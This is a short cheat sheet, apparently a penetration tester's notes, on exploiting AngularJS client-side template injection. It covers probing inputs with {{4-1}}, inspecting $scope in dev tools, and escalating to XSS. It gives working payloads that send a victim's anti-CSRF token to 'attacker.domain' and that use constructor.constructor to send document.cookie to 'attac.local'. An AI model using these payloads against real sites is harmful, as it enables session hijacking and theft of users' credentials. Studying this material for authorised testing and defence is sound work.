Template Injection & Scope Hacking
- The attack is limited to functions and variables exposed on `$scope`.
- Check whether the application uses AngularJS and whether it is vulnerable to template injection:
- Check the page source for the `angular` keyword.
- Open dev tools --> Console --> `angular.element($0).scope()`
- This lists the scope: all the elements in the page.
- Check the source code of the scope functions to see what each one is doing:
- Developer tools --> Debugger --> select app.js (or whatever the JS file is named) --> search for that function.
- Check for any injectable variables (e.g. some empty or dynamically filled content).
- Call the function.
- Send the payload below as input and watch the outbound connection, which carries the victim's anti-CSRF token:
- `{{Function_Name("https://attacker.domain/reach.php?x="+anti_csrf"")}}`
- Input `{{4-1}}` --> if the output is 3 --> VULNERABLE
- Use this in any input field or search parameter.
Going Beyond the Scope - XSS via Template Injection
- Works in AngularJS >= 1.6.0
- https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs
- Find the Angular version in dev tools --> Console --> `angular.version`
- Create an alert: `{{constructor.constructor('alert(document.domain)')()}}`
- Get the user cookie: `{{constructor.constructor('$.get(\'//attac.local/log.php?\'+document.cookie)')()}}`
- If there is a known variable: `#var_name=constructor.constructor('$.get(\'//attac.local/log.php?\'+document.cookie)')()`